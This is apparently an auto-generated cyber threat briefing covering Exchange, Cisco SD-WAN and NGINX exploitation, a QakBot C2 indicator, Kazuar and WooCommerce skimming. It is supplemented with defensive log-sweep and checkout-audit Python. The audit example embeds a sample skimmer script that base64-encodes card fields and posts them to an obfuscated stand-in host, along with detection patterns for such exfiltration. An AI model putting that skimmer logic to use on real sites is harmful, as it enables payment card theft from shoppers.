Cyber Threat Briefing

PUBLISHED 17 May 2026, 22:01 UTC
CLASSIFICATION TLP:CLEAR
AUTO-GENERATED PureTensor Cyber Intelligence
Critical CVEs: 3
High CVEs: 17
KEV Added: 2
New IOCs: 0
Malware Samples: 0
Active C2s: 1
Threat Level: CRITICAL

DELTA — CHANGES SINCE LAST BRIEFING

THREAT LEVEL ASSESSMENT

The overall threat level is CRITICAL because several high-impact vulnerabilities are under active exploitation at once: Microsoft Exchange Server (CVE-2026-42897) and Cisco Catalyst SD-WAN Controller (CVE-2026-20182), both now in CISA's KEV catalog, and NGINX (CVE-2026-42945), reported exploited but not yet listed. This is compounded by broad exploitation of WordPress plugin flaws (notably Funnel Builder checkout skimming) and by a QakBot C2 server that remains online. Additional critical CVEs enabling remote code execution and unauthenticated arbitrary file upload further raise organizational risk. The period is characterized by rapid weaponization of newly disclosed vulnerabilities and ongoing supply chain compromises, including the node-ipc npm package and the theft of Grafana source code via a leaked GitHub token.

CRITICAL VULNERABILITIES

CVE | Product | CVSS | Status | Impact
CVE-2018-25320 | ACL Analytics 11.x-13.0.0.579 | 9.8 | Not in KEV | Arbitrary code execution via the EXECUTE function, enabling PowerShell delivery and system-level takeover.
CVE-2018-25332 | GitBucket 4.23.1 | 9.8 | Not in KEV | Unauthenticated RCE via weak token generation and malicious JAR upload.
CVE-2018-25335 | WordPress plugin Peugeot Music 1.0 | 9.8 | Not in KEV | Unauthenticated arbitrary file upload enabling remote code execution.
CVE-2026-42897 | Microsoft Exchange Server | Not scored | KEV / active exploitation | XSS via crafted email enabling authenticated session hijacking and lateral movement.
CVE-2026-20182 | Cisco Catalyst SD-WAN Controller | 10.0 | KEV / active exploitation | Authentication bypass granting full administrative access to the SD-WAN control plane.

ACTIVE EXPLOITS & KEV

CVE | Vendor / Product | Description | Added | Remediation Due | Status
CVE-2026-42897 | Microsoft Exchange Server | Cross-site scripting enabling credential theft and post-authentication exploitation. | 2026-05-15 | 2026-05-29 | Active exploitation confirmed
CVE-2026-20182 | Cisco Catalyst SD-WAN Controller | Authentication bypass granting administrative control. | 2026-05-14 | 2026-05-17 | Active exploitation confirmed

MALWARE & THREAT ACTORS

QakBot: Feodo Tracker lists an active QakBot C2 server at 50.16.16.211:443, online since December 2025. QakBot remains a modular banking trojan used for credential harvesting, lateral movement, and ransomware staging. A C2 that stays online for months suggests ongoing botnet operations and a possible resurgence after the earlier takedown. Any outbound connection from an internal host to this IP and port should be treated as a high-fidelity indicator.
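The C2 entry above is the only concrete network indicator in this briefing. The following sweep is an added example (not part of the briefing and not PureTensor tooling) that runs the indicator over firewall-style key=value log lines; the log lines are constructed for illustration, and the field names (ts, src, dst, dport, action, bytes) are assumptions about a generic export, not any vendor's format. It distinguishes an exact IP:port match from contact with the C2 host on some other port, since the latter is still worth a look but is not the listed indicator.

```python
"""Sweep key=value firewall logs for the QakBot C2 listed in the briefing.

Added example, not from the briefing. SAMPLE_LOG is constructed; the
field names are an assumed generic export format.
"""
import re
from collections import defaultdict

# IOC from the briefing: Feodo Tracker QakBot C2 at 50.16.16.211:443
C2_IOCS = {("50.16.16.211", 443)}

# Constructed sample traffic. Not real log data.
SAMPLE_LOG = """\
ts=2026-05-17T21:40:11Z src=10.0.5.23 dst=50.16.16.211 dport=443 proto=tcp action=allow bytes=18400
ts=2026-05-17T21:41:02Z src=10.0.5.23 dst=142.250.80.46 dport=443 proto=tcp action=allow bytes=2210
ts=2026-05-17T21:42:30Z src=10.0.7.8 dst=50.16.16.211 dport=8443 proto=tcp action=deny bytes=0
ts=2026-05-17T21:45:00Z src=10.0.9.41 dst=50.16.16.211 dport=443 proto=tcp action=allow bytes=972
ts=2026-05-17T21:46:17Z src=10.0.5.23 dst=50.16.16.211 dport=443 proto=tcp action=allow bytes=33120
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_kv_line(line):
    """Parse one key=value line into a dict; None if the line lacks dst/dport or has bad numbers."""
    fields = dict(KV_RE.findall(line))
    if "dst" not in fields or "dport" not in fields:
        return None
    try:
        fields["dport"] = int(fields["dport"])
        fields["bytes"] = int(fields.get("bytes", 0))
    except ValueError:
        return None
    return fields


def classify(fields, iocs=C2_IOCS):
    """'ip+port' for an exact IOC match, 'ip-only' for the C2 host on another port, else None."""
    if (fields["dst"], fields["dport"]) in iocs:
        return "ip+port"
    if fields["dst"] in {ip for ip, _ in iocs}:
        return "ip-only"
    return None


def sweep(log_text, iocs=C2_IOCS):
    """Return every parsed log record that touches an IOC host, tagged with the match kind."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_kv_line(line)
        if fields is None:
            continue
        kind = classify(fields, iocs)
        if kind:
            hits.append({**fields, "match": kind})
    return hits


def summarize(hits):
    """Aggregate allowed exact matches per internal source: count, bytes, first and last seen."""
    out = defaultdict(lambda: {"count": 0, "bytes": 0, "first": None, "last": None})
    for h in hits:
        if h["match"] != "ip+port" or h.get("action") != "allow":
            continue
        s = out[h["src"]]
        s["count"] += 1
        s["bytes"] += h["bytes"]
        s["first"] = h["ts"] if s["first"] is None else min(s["first"], h["ts"])
        s["last"] = h["ts"] if s["last"] is None else max(s["last"], h["ts"])
    return dict(out)


if __name__ == "__main__":
    found = sweep(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['src']} -> {h['dst']}:{h['dport']} {h['action']} [{h['match']}]")
    for src, s in summarize(found).items():
        print(f"{src}: {s['count']} allowed sessions, {s['bytes']} bytes, {s['first']} .. {s['last']}")
```

The per-source summary is what goes into a ticket: a host with repeated allowed sessions and a growing byte count is a beaconing candidate, whereas a single denied attempt on a different port is a lower-priority lead.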

State-linked activity: Reports indicate that Secret Blizzard (Microsoft's name for the Russian state-linked group more widely tracked as Turla) has upgraded the Kazuar backdoor into a modular peer-to-peer botnet, improving stealth, data collection, and long-term persistence. Coverage that refers to Turla deploying an evolved Kazuar variant with expanded capabilities describes the same actor and the same implant under a different vendor name, not a second campaign.

Financially motivated actors: Exploitation of the Funnel Builder WordPress plugin continues, with attackers injecting malicious JavaScript into WooCommerce checkout flows to skim payment card data at scale. Supply chain attacks persist, including the node-ipc npm compromise targeting credential exfiltration.

CYBER NEWS DIGEST

CISA adds Microsoft Exchange CVE-2026-42897 to KEV (CISA Alerts). The XSS flaw in on-premises Exchange Server is under active exploitation via crafted emails; a successful attack lets the attacker steal the victim's session token and move laterally within the domain. The KEV remediation date of 29 May 2026 is binding on US federal civilian agencies under BOD 22-01; other organizations should treat it as the benchmark for their own patching.

Cisco SD-WAN Controller exploitation continues (The Hacker News / Dark Reading). The maximum-severity (CVSS 10.0) authentication bypass CVE-2026-20182 is confirmed exploited to gain administrative access to the controller. CISA added it to KEV on 14 May with a remediation date of 17 May 2026, an unusually short three-day window that reflects the breadth of exploitation across enterprise SD-WAN deployments.

NGINX CVE-2026-42945 exploited in the wild (The Hacker News). A newly disclosed vulnerability affecting NGINX Plus and NGINX Open Source is being actively exploited. The confirmed impact is a worker process crash (denial of service); whether it escalates to RCE depends on configuration. Weaponization followed disclosure quickly. As of this briefing the CVE is not in the KEV catalog.

Grafana GitHub token breach results in source code theft (The Hacker News). Attackers obtained a GitHub token with repository access, downloaded internal source code, and attempted extortion. No customer data exposure has been reported so far, but the incident shows how a single long-lived access token can expose an entire codebase and the supply chain that depends on it.

Funnel Builder WordPress plugin exploited for checkout skimming (Bleeping Computer / The Hacker News). A critical vulnerability in the Funnel Builder plugin is being abused to inject malicious JavaScript into WooCommerce sites. The injected code harvests payment data directly from checkout pages as shoppers enter it. The exploitation wave is broad and ongoing.
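The skimming described here and in the Malware & Threat Actors section above shows up in the rendered checkout page, regardless of whether the attacker wrote the payload into a plugin file or a database option. The following audit is an added example (not part of the briefing and not Funnel Builder or WooCommerce code) that parses a checkout page, flags external scripts whose host is not on a store's allowlist, and flags inline scripts that both touch payment fields and send data off the page. The sample HTML, the allowlisted hosts, and the page hostname are constructed assumptions; a real store would populate the allowlist from a known-good snapshot.

```python
"""Audit a WooCommerce checkout page for injected skimmer scripts.

Added example, not from the briefing. SAMPLE_CHECKOUT_HTML, PAGE_HOST and
ALLOWED_SCRIPT_HOSTS are constructed assumptions for a hypothetical store.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_HOST = "shop.example"                                   # assumed store hostname
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example", "js.stripe.com"}  # assumed known-good hosts

# Inline-script heuristics: payment field access combined with an outbound channel,
# or the obfuscation primitives skimmers commonly use to hide their collection URL.
FIELD_RE = re.compile(r"(card|cvv|cvc|ccnum|expir)", re.I)
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=)", re.I)
OBFUSC_RE = re.compile(r"(atob\(|fromCharCode|unescape\(|eval\()", re.I)

# Constructed checkout page: two legitimate scripts, one benign inline handler,
# then an injected external loader and an injected inline skimmer.
SAMPLE_CHECKOUT_HTML = """\
<html><body>
<script src="https://cdn.example/jquery.min.js"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>jQuery(function($){ $('#billing_country').on('change', function(){ $(document.body).trigger('update_checkout'); }); });</script>
<form id="checkout"><input id="card-number" name="ccnum"><input name="cvc"></form>
<script src="https://assets.unknown-cdn.example/fb.js"></script>
<script>
document.querySelector('#checkout').addEventListener('submit',function(){
  var d=btoa(document.querySelector('[name=ccnum]').value+'|'+document.querySelector('[name=cvc]').value);
  fetch(atob('aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUvZw=='),{method:'POST',body:d});
});
</script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def audit_checkout(html, page_host=PAGE_HOST, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for scripts that should not be on a checkout page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname or page_host   # relative URL loads from the page host
            if host not in allowed_hosts:
                findings.append({"type": "external-script", "src": src, "host": host})
            continue
        reasons = []
        if FIELD_RE.search(body) and EXFIL_RE.search(body):
            reasons.append("reads payment fields and sends data out")
        if OBFUSC_RE.search(body):
            reasons.append("uses obfuscation primitives")
        if reasons:
            findings.append({"type": "inline-script", "reasons": reasons, "snippet": body.strip()[:80]})
    return findings


if __name__ == "__main__":
    for f in audit_checkout(SAMPLE_CHECKOUT_HTML):
        print(f)
```

The heuristics are deliberately conjunctive for inline code: a benign WooCommerce handler touches form fields and a benign analytics tag calls fetch, but a script that does both on the checkout page deserves a human look. Run it against a fetched copy of the live checkout page on a schedule and diff the findings, since skimmers are typically injected and rotated without any change to the plugin files an integrity scanner watches.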

Kazuar backdoor evolves into modular P2P botnet (Bleeping Computer / The Hacker News). Russian state-sponsored operators (Turla, tracked by Microsoft as Secret Blizzard) have significantly upgraded the long-running Kazuar implant. The peer-to-peer architecture reduces reliance on centralized infrastructure, so blocking or seizing individual C2 servers does far less to disrupt the botnet, and detection has to lean on host and lateral-traffic telemetry rather than known C2 addresses.

Canvas breach impacts US schools and universities (Krebs on Security). A major extortion attack disrupted the Canvas learning management platform nationwide, halting coursework and prompting congressional scrutiny. The ShinyHunters group reportedly reached an "agreement" with the vendor following its data theft claims.

Copy.Fail: severe Linux kernel LPE (Schneier on Security). A major local privilege escalation vulnerability disclosed in late April 2026 gives attackers a reliable path to root on unpatched systems. The flaw is widely regarded as one of the most serious kernel issues in years; because it is local, it matters most as the second stage after any of the initial-access vulnerabilities above lands on a Linux host.